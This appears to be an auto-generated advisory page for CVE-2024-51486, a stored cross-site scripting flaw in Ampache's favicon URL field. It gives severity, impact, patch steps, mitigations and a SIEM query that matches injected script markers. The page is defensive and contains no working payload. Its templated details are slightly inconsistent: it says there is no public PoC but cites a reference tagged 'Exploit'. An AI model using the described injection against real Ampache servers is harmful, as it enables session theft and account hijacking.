CVE-2024-51486 – This is a stored cross-site scripting (XSS) vul... (How to Fix)

Q: What is the severity of CVE-2024-51486?

CVE-2024-51486 has a CVSS score of 5.5 (MEDIUM). This is a stored cross-site scripting (XSS) vulnerability in Ampache's interface configuration that allows authenticated users to inject malicious JavaScript into the favicon URL field. When other users view the affected interface page, the malicious script executes in their browser context. All Ampache instances running vulnerable versions are affected.

📋 TL;DR

This is a stored cross-site scripting (XSS) vulnerability in Ampache's interface configuration that allows authenticated users to inject malicious JavaScript into the favicon URL field. When other users view the affected interface page, the malicious script executes in their browser context. All Ampache instances running vulnerable versions are affected.

💻 Affected Systems

Products:

Ampache

Versions: Versions before 7.0.1

Operating Systems: All

Default Config Vulnerable: ⚠️ Yes

Notes: Requires authenticated user access to the interface configuration section.

📦 What is this software?

Ampache by Ampache

View all CVEs affecting Ampache →

⚠️ Risk & Real-World Impact

🔴

Worst Case

An authenticated attacker could steal session cookies, perform actions as other users, redirect to malicious sites, or deploy additional payloads to compromise the Ampache server or user systems.

🟠

Likely Case

An authenticated malicious user could steal session tokens to hijack other users' accounts, potentially gaining administrative privileges or accessing sensitive media content.

🟢

If Mitigated

With proper input validation and output encoding, the malicious input would be treated as plain text rather than executable code, preventing any script execution.

🌐 Internet-Facing: HIGH

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: UNKNOWN

Unauthenticated Exploit: ✅ No

Complexity: LOW

Exploitation requires authenticated access to the vulnerable configuration interface.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 7.0.1

Vendor Advisory: https://github.com/ampache/ampache/security/advisories/GHSA-4xw5-f7xm-vpw5

Restart Required: Yes

Instructions:

1. Backup your Ampache configuration and database. 2. Download Ampache 7.0.1 or later from the official repository. 3. Replace the existing installation with the new version. 4. Restart your web server service.

🧯 If You Can't Patch

Restrict access to the interface configuration page to trusted administrators only.
Implement a web application firewall (WAF) with XSS protection rules.

🔍 How to Verify

Check if Vulnerable:

Check if your Ampache version is below 7.0.1 by viewing the version in the web interface footer or checking the CHANGELOG.md file.

Check Version:

grep "version" config/ampache.cfg.php | grep -i version

Verify Fix Applied:

After upgrading, verify the version shows 7.0.1 or higher and test that JavaScript input in the favicon URL field is properly sanitized (appears as plain text).

📡 Detection & Monitoring

Log Indicators:

Unusual JavaScript patterns in configuration update logs
Multiple failed login attempts followed by configuration changes

Network Indicators:

Unexpected outbound connections from Ampache server to external domains after configuration changes

SIEM Query:

source="ampache_logs" AND (message="*favicon*" AND message="*javascript:*" OR message="*<script>*")

📊 Metadata

CVE ID: CVE-2024-51486

CVSS v3 Score: 5.5 (MEDIUM)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L

CWE: CWE-79

Published: November 11, 2024

Last Updated: November 21, 2024

🔗 References

https://github.com/ampache/ampache/security/advisories/GHSA-4xw5-f7xm-vpw5 Exploit,Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2024-51486, you might also want to check these: